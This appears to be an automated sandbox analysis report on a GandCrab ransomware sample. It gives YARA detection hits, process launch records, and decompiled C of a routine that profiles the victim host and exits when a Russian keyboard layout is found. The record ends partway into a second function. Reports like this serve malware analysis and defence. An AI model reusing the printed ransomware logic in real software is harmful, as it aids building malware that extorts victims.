Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000021.00000000.547433699.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000021.00000002.567428078.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000021.00000002.567450621.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wzltxa.exePID: 4920, Parent PID: 3452

General

Target ID:	34
Start time:	00:09:44
Start date:	01/09/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Imagebase:	0xfbb0000
File size:	71680 bytes
MD5 hash:	EAC223A7EC1CF2E33BE569DB14A87A63
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000022.00000000.561698093.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000022.00000002.565428063.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wzltxa.exePID: 1200, Parent PID: 3452

General

Target ID:	39
Start time:	00:09:53
Start date:	01/09/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Imagebase:	0xfbb0000
File size:	71680 bytes
MD5 hash:	EAC223A7EC1CF2E33BE569DB14A87A63
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000027.00000002.606192732.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000027.00000002.606206614.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000027.00000000.580667243.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wzltxa.exePID: 5280, Parent PID: 3452

General

Target ID:	40
Start time:	00:10:01
Start date:	01/09/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Imagebase:	0xfbb0000
File size:	71680 bytes
MD5 hash:	EAC223A7EC1CF2E33BE569DB14A87A63
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000028.00000000.597821532.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000028.00000002.601264865.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: mPNVrHIpyt.exePID: 3592, Parent PID: 3508COMMON

Execution Graph

Execution Coverage:	22.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	44.3%
Total number of Nodes:	718
Total number of Limit Nodes:	14

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0F697490 Relevance: 142.2, APIs: 55, Strings: 26, Instructions: 499
memorystringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E0F697490(DWORD* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				long _v16;
				long _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t154;
				long _t155;
				WCHAR* _t157;
				short _t158;
				short _t159;
				short _t160;
				signed int _t161;
				signed int _t164;
				signed int _t166;
				int _t178;
				void* _t181;
				signed int _t183;
				signed int _t186;
				WCHAR* _t190;
				void* _t191;
				void* _t199;
				_Unknown_base(*)()* _t204;
				signed int _t211;
				intOrPtr _t216;
				WCHAR* _t218;
				WCHAR* _t220;
				void* _t221;
				void* _t224;
				WCHAR* _t226;
				long _t229;
				int _t230;
				long _t234;
				void* _t238;
				long _t240;
				long _t243;
				WCHAR* _t246;
				void* _t247;
				WCHAR* _t249;
				WCHAR* _t250;
				WCHAR* _t252;
				void* _t256;
				DWORD* _t260;
				short* _t261;
				DWORD* _t266;
				void* _t267;
				signed int _t270;
				void* _t274;
				void* _t276;
				void* _t277;
				DWORD* _t279;
				void* _t280;
				void* _t281;

				_t267 = __edx;
				_t260 = __ecx;
				_t279 = __ecx;
				if( *__ecx != 0) {
					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 8) = _t252;
					_v24 = 0x100;
					GetUserNameW(_t252, _t260); // executed
				}
				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
					_v24 = 0x1e;
					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 0x14) = _t250;
					GetComputerNameW(_t250, _t260);
				}
				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
					L11:
					if( *(_t279 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
							L31:
							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4); // executed
								_push(_t260);
								 *(_t279 + 0x50) = _t220;
								_t221 = E0F697410(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80); // executed
								if(_t221 == 0) {
									_push(_t260);
									E0F697410(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
									wsprintfW( *(_t279 + 0x50), L"error");
									_t281 = _t281 + 8;
								}
							}
							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
								L44:
								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
									_v28 = 0;
									_t216 = E0F697B70(_t279 + 0x2c,  &_v28); // executed
									if(_t216 == 0) {
										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
									}
								}
								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x68) = _t190;
									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
									_t276 = _t191;
									GetWindowsDirectoryW(_t276, 0x100);
									_t66 = _t276 + 0x600; // 0x600
									_t266 = _t66;
									 *((short*)(_t276 + 6)) = 0;
									_t68 = _t276 + 0x400; // 0x400
									_t69 = _t276 + 0x604; // 0x604
									_t70 = _t276 + 0x608; // 0x608
									_t71 = _t276 + 0x200; // 0x200
									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
									_push(_t266);
									_t72 = _t276 + 0x60c; // 0x60c
									_t260 = _t72;
									_t199 = E0F697410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
									if(_t199 != 0) {
										_t73 = _t276 + 0x60c; // 0x60c
										_t211 = lstrlenW(_t73);
										_t74 = _t276 + 0x60c; // 0x60c
										_t260 = _t74;
										_push(_t260);
										E0F697410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
									}
									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
									_t79 = _t276 + 0x60c; // 0x60c
									_t281 = _t281 + 0xc;
									lstrcatW( *(_t279 + 0x68), _t79);
									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
									_v28 = _t204;
									if(_t204 == 0) {
										 *(_t279 + 0x6c) = 0;
									} else {
										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
									}
									 *(_t279 + 0x70) =  *(_t276 + 0x600);
									VirtualFree(_t276, 0, 0x8000); // executed
								}
								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
									L67:
									if( *(_t279 + 0x80) == 0) {
										L72:
										return 1;
									}
									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
									 *(_t279 + 0x84) = _t154;
									if(_t154 == 0) {
										L71:
										 *(_t279 + 0x80) = 0;
										goto L72;
									}
									_push(_t260);
									_t155 = E0F696FF0(_t154); // executed
									if(_t155 != 0) {
										goto L72;
									}
									VirtualFree( *(_t279 + 0x84), _t155, 0x8000); // executed
									goto L71;
								} else {
									_v68 = L"UNKNOWN";
									_v64 = L"NO_ROOT_DIR";
									_v60 = L"REMOVABLE";
									_v56 = L"FIXED";
									_v52 = L"REMOTE";
									_v48 = L"CDROM";
									_v44 = L"RAMDISK";
									_t157 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x7c) = _t157;
									_t261 =  &_v132;
									_t158 = 0x41;
									do {
										 *_t261 = _t158;
										_t261 = _t261 + 2;
										_t158 = _t158 + 1;
									} while (_t158 <= 0x5a);
									_t159 =  *L"?:\\"; // 0x3a003f
									_v40 = _t159;
									_t160 =  *0xf69f350; // 0x5c
									_v36 = _t160;
									_t161 = 0;
									_v24 = 0;
									do {
										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
										_t164 = GetDriveTypeW( &_v40); // executed
										_t270 = _t164;
										if(_t270 > 2 && _t270 != 5) {
											_v36 = 0;
											lstrcatW( *(_t279 + 0x7c),  &_v40);
											_v36 = 0x5c;
											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
											lstrcatW( *(_t279 + 0x7c), "_");
											_t178 = GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16); // executed
											if(_t178 == 0) {
												lstrcatW( *(_t279 + 0x7c), L"0,");
												goto L64;
											}
											_v8 = E0F698AB0(_v16, 0, _v28 * _v20, 0);
											_t256 = _t267;
											_t181 = E0F698AB0(_v12, 0, _v28 * _v20, 0);
											_t274 = _v8;
											_v32 = _t274 - _t181;
											asm("sbb eax, edx");
											_v8 = _t256;
											_t183 = lstrlenW( *(_t279 + 0x7c));
											_push(_t256);
											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
											_t186 = lstrlenW( *(_t279 + 0x7c));
											_push(_v8);
											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
											_t281 = _t281 + 0x20;
											lstrcatW( *(_t279 + 0x7c), ",");
										}
										_t161 = _v24 + 1;
										_v24 = _t161;
									} while (_t161 < 0x1b);
									_t166 = lstrlenW( *(_t279 + 0x7c));
									_t260 =  *(_t279 + 0x7c);
									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
									goto L67;
								}
							} else {
								__imp__GetNativeSystemInfo( &_v76); // executed
								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4); // executed
								_t260 = _v76 & 0x0000ffff;
								 *(_t279 + 0x5c) = _t218;
								if(_t260 > 9) {
									L42:
									_push(L"Unknown");
									L43:
									wsprintfW(_t218, ??);
									_t281 = _t281 + 8;
									goto L44;
								}
								_t260 =  *(_t260 + E0F697B60) & 0x000000ff;
								switch( *((intOrPtr*)(_t260 * 4 +  &M0F697B4C))) {
									case 0:
										_push(L"x86");
										goto L43;
									case 1:
										_push(L"ARM");
										goto L43;
									case 2:
										_push(L"Itanium");
										goto L43;
									case 3:
										_push(L"x64");
										goto L43;
									case 4:
										goto L42;
								}
							}
						}
						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4); // executed
						_v8 = _t224;
						_v20 = _t224 + 0xe;
						_t226 = VirtualAlloc(0, 4, 0x3000, 4); // executed
						 *(_t279 + 0x44) = _t226;
						_t277 = 1;
						_v24 = 1;
						do {
							wsprintfW(_v8, L"%d", _t277);
							_t281 = _t281 + 0xc;
							_v16 = 0;
							_t277 = _t277 + 1;
							_t229 = RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12); // executed
							if(_t229 != 0) {
								L27:
								_t230 = 0;
								_v24 = 0;
								goto L28;
							}
							_v28 = 0x80;
							_t234 = RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28); // executed
							if(_t234 != 0) {
								GetLastError();
							} else {
								_v16 = 1;
							}
							RegCloseKey(_v12); // executed
							if(_v16 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v20, L"00000419") == 0) {
									_t218 = wsprintfW( *(_t279 + 0x44), "1");
									_t281 = _t281 + 8;
									ExitProcess(0);
								}
								_t230 = _v24;
							}
							L28:
						} while (_t277 != 9 && _t230 != 0);
						wsprintfW( *(_t279 + 0x44), "0");
						_t281 = _t281 + 8;
						VirtualFree(_v8, 0, 0x8000); // executed
						goto L31;
					}
					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					_v20 = _t238;
					 *(_t279 + 0x38) = _t238;
					_v12 = 0;
					_t240 = RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8); // executed
					if(_t240 != 0) {
						L17:
						 *(_t279 + 0x30) = 0;
						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v24 = 0x40;
					_t243 = RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24); // executed
					if(_t243 != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v8); // executed
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t279 + 0x20) = _t246;
					if(_t246 == 0) {
						goto L11;
					}
					_push(_t260);
					_t247 = E0F697410(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
					if(_t247 == 0) {
						wsprintfW( *(_t279 + 0x20), L"undefined");
						L10:
						_t281 = _t281 + 8;
						goto L11;
					}
					_t249 =  *(_t279 + 0x20);
					if( *_t249 != 0) {
						goto L11;
					}
					wsprintfW(_t249, L"WORKGROUP");
					goto L10;
				}
			}

0x0f697490
0x0f697490
0x0f69749b
0x0f6974a7
0x0f6974b7
0x0f6974b9
0x0f6974bc
0x0f6974c1
0x0f6974c8
0x0f6974c8
0x0f6974d2
0x0f6974df
0x0f6974e6
0x0f6974e8
0x0f6974eb
0x0f6974f0
0x0f6974f0
0x0f697500
0x0f697556
0x0f69755a
0x0f6975f5
0x0f6975f9
0x0f6976f9
0x0f6976fd
0x0f69770d
0x0f69770f
0x0f697725
0x0f697728
0x0f69772f
0x0f697731
0x0f697749
0x0f697756
0x0f697758
0x0f697758
0x0f69772f
0x0f69775f
0x0f6977ce
0x0f6977d2
0x0f6977d7
0x0f6977e3
0x0f6977ea
0x0f6977ec
0x0f6977ec
0x0f6977ea
0x0f6977f3
0x0f697807
0x0f697817
0x0f69781a
0x0f69781c
0x0f697824
0x0f69782c
0x0f69782c
0x0f697837
0x0f69783b
0x0f697842
0x0f697849
0x0f697856
0x0f69785e
0x0f697864
0x0f69786a
0x0f69786a
0x0f697880
0x0f697887
0x0f697889
0x0f697890
0x0f697896
0x0f697896
0x0f69789c
0x0f6978b5
0x0f6978b5
0x0f6978c8
0x0f6978d0
0x0f6978d6
0x0f6978dd
0x0f6978f0
0x0f6978f6
0x0f6978fb
0x0f697919
0x0f6978fd
0x0f697914
0x0f697914
0x0f69792e
0x0f697931
0x0f697931
0x0f697943
0x0f697af2
0x0f697af9
0x0f697b42
0x0f697b4b
0x0f697b4b
0x0f697b09
0x0f697b0f
0x0f697b17
0x0f697b36
0x0f697b36
0x00000000
0x0f697b36
0x0f697b19
0x0f697b1b
0x0f697b22
0x00000000
0x00000000
0x0f697b30
0x00000000
0x0f697949
0x0f697957
0x0f69795e
0x0f697965
0x0f69796c
0x0f697973
0x0f69797a
0x0f697981
0x0f697988
0x0f69798e
0x0f697991
0x0f697994
0x0f6979a0
0x0f6979a0
0x0f6979a3
0x0f6979a6
0x0f6979a7
0x0f6979ad
0x0f6979b2
0x0f6979b5
0x0f6979ba
0x0f6979bd
0x0f6979bf
0x0f6979c2
0x0f6979c7
0x0f6979cf
0x0f6979d5
0x0f6979da
0x0f6979eb
0x0f6979f6
0x0f697a04
0x0f697a08
0x0f697a12
0x0f697a28
0x0f697a30
0x0f697acb
0x00000000
0x0f697acb
0x0f697a52
0x0f697a55
0x0f697a57
0x0f697a5c
0x0f697a68
0x0f697a6b
0x0f697a6d
0x0f697a70
0x0f697a79
0x0f697a8a
0x0f697a98
0x0f697a9a
0x0f697aac
0x0f697ab4
0x0f697abf
0x0f697abf
0x0f697ad6
0x0f697ad7
0x0f697ada
0x0f697ae6
0x0f697ae8
0x0f697aed
0x00000000
0x0f697aed
0x0f697761
0x0f697765
0x0f697776
0x0f697778
0x0f69777c
0x0f697782
0x0f6977c3
0x0f6977c3
0x0f6977c8
0x0f6977c9
0x0f6977cb
0x00000000
0x0f6977cb
0x0f697784
0x0f69778b
0x00000000
0x0f6977bc
0x00000000
0x00000000
0x0f6977ae
0x00000000
0x00000000
0x0f6977b5
0x00000000
0x00000000
0x0f6977a7
0x00000000
0x00000000
0x00000000
0x00000000
0x0f69778b
0x0f69775f
0x0f69760d
0x0f697616
0x0f697620
0x0f697623
0x0f697625
0x0f697628
0x0f69762d
0x0f697634
0x0f69763d
0x0f69763f
0x0f697642
0x0f69764c
0x0f69765f
0x0f697667
0x0f6976c4
0x0f6976c4
0x0f6976c6
0x00000000
0x0f6976c6
0x0f69766c
0x0f697681
0x0f697689
0x0f697694
0x0f69768b
0x0f69768b
0x0f69768b
0x0f69769d
0x0f6976a7
0x00000000
0x0f6976a9
0x0f6976b9
0x0f69779a
0x0f69779c
0x0f6977a1
0x0f6977a1
0x0f6976bf
0x0f6976bf
0x0f6976c9
0x0f6976c9
0x0f6976de
0x0f6976e0
0x0f6976ed
0x00000000
0x0f6976f3
0x0f69756e
0x0f697570
0x0f697573
0x0f69758b
0x0f697592
0x0f69759a
0x0f6975de
0x0f6975e8
0x0f6975ef
0x00000000
0x0f6975ef
0x0f69759f
0x0f6975b6
0x0f6975be
0x0f6975c9
0x0f6975c0
0x0f6975c0
0x0f6975c0
0x0f6975d2
0x0f6975dc
0x00000000
0x00000000
0x00000000
0x00000000
0x0f697502
0x0f697510
0x0f697512
0x0f697517
0x00000000
0x00000000
0x0f697519
0x0f69752f
0x0f697536
0x0f697551
0x0f697551
0x0f697553
0x00000000
0x0f697553
0x0f697538
0x0f69753f
0x00000000
0x00000000
0x0f697551
0x00000000
0x0f697551

APIs

VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F6974B7
GetUserNameW.ADVAPI32(00000000,?), ref: 0F6974C8
VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F6974E6
GetComputerNameW.KERNEL32 ref: 0F6974F0
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F697510
wsprintfW.USER32 ref: 0F697551
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F69756E
RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F697592
RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F694810,?), ref: 0F6975B6
GetLastError.KERNEL32 ref: 0F6975C9
RegCloseKey.KERNEL32(00000000), ref: 0F6975D2
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F6975EF
VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 0F69760D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F697623
wsprintfW.USER32 ref: 0F69763D
RegOpenKeyExW.KERNEL32(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0F69765F
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,0F694810,?), ref: 0F697681
GetLastError.KERNEL32 ref: 0F697694
RegCloseKey.KERNEL32(?), ref: 0F69769D
lstrcmpiW.KERNEL32(0F694810,00000419), ref: 0F6976B1
wsprintfW.USER32 ref: 0F6976DE
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F6976ED
VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0F69770D
wsprintfW.USER32 ref: 0F697756
GetNativeSystemInfo.KERNEL32(?), ref: 0F697765
VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 0F697776
wsprintfW.USER32 ref: 0F69779A
ExitProcess.KERNEL32 ref: 0F6977A1
wsprintfW.USER32 ref: 0F6977C9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F697807
VirtualAlloc.KERNEL32(00000000,00000E0C,00003000,00000004), ref: 0F69781A
GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0F697824
GetVolumeInformationW.KERNEL32(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0F69785E
lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F697890
wsprintfW.USER32 ref: 0F6978C8
lstrcatW.KERNEL32(?,0000060C), ref: 0F6978DD
GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0F6978E9
GetProcAddress.KERNEL32(00000000), ref: 0F6978F0
lstrlenW.KERNEL32(?), ref: 0F697900
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F697931

Part of subcall function 0F697B70: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0F697B8D
Part of subcall function 0F697B70: VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F697C01
Part of subcall function 0F697B70: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F697C16
Part of subcall function 0F697B70: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F697C2C

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F697988
GetDriveTypeW.KERNEL32(?), ref: 0F6979CF
lstrcatW.KERNEL32(?,?), ref: 0F6979F6
lstrcatW.KERNEL32(?,0F6A030C), ref: 0F697A08
lstrcatW.KERNEL32(?,0F6A0380), ref: 0F697A12
GetDiskFreeSpaceW.KERNEL32(?,?,0F694810,?,00000000), ref: 0F697A28
lstrlenW.KERNEL32(?,?,00000000,0F694810,00000000,00000000,00000000,0F694810,00000000), ref: 0F697A70
wsprintfW.USER32 ref: 0F697A8A
lstrlenW.KERNEL32(?), ref: 0F697A98
wsprintfW.USER32 ref: 0F697AAC
lstrcatW.KERNEL32(?,0F6A03A0), ref: 0F697ABF
lstrcatW.KERNEL32(?,0F6A03A4), ref: 0F697ACB
lstrlenW.KERNEL32(?), ref: 0F697AE6
VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 0F697B09
VirtualFree.KERNELBASE(?,00000000,00008000,00000000), ref: 0F697B30

Strings

LocaleName, xrefs: 0F6975AE
Identifier, xrefs: 0F6978A6
%I64u, xrefs: 0F697AA3
Itanium, xrefs: 0F6977B5
WORKGROUP, xrefs: 0F697541
Unknown, xrefs: 0F6977C3
error, xrefs: 0F69774E
Domain, xrefs: 0F697520
x64, xrefs: 0F6977A7
ARM, xrefs: 0F6977AE
x86, xrefs: 0F6977BC
ProcessorNameString, xrefs: 0F697871
Control Panel\International, xrefs: 0F697581
undefined, xrefs: 0F697549
SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion, xrefs: 0F69773F
RtlComputeCrc32, xrefs: 0F6978DF
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0F69771B
?:\, xrefs: 0F6979AD
00000419, xrefs: 0F6976A9
productName, xrefs: 0F697716, 0F69773A
Keyboard Layout\Preload, xrefs: 0F697655
@, xrefs: 0F69759F
%I64u/, xrefs: 0F697A84
SYSTEM\CurrentControlSet\services\Tcpip\Parameters, xrefs: 0F697525
ntdll.dll, xrefs: 0F6978E4
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0F697876, 0F6978AB

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
String ID: %I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
API String ID: 153366582-983031137
Opcode ID: e50ea4867d6a47ce27d5d0a6db673486aa59daaf3657f66f101dceba45998e2f
Instruction ID: 9a64582844a8518d0a88b69c97b52f4ebfac016ef8688e024c26a7f612e79f7b
Opcode Fuzzy Hash: e50ea4867d6a47ce27d5d0a6db673486aa59daaf3657f66f101dceba45998e2f
Instruction Fuzzy Hash: F7129E70A44305BBEF219FA4CC46FAABBFCFF04705F100519F641A6291DBB6A924CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0F695860 Relevance: 109.0, APIs: 55, Strings: 7, Instructions: 458
stringmemoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E0F695860(CHAR* __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v148;
				char _v152;
				void* _v156;
				int _v160;
				int _v164;
				CHAR* _v172;
				int _v176;
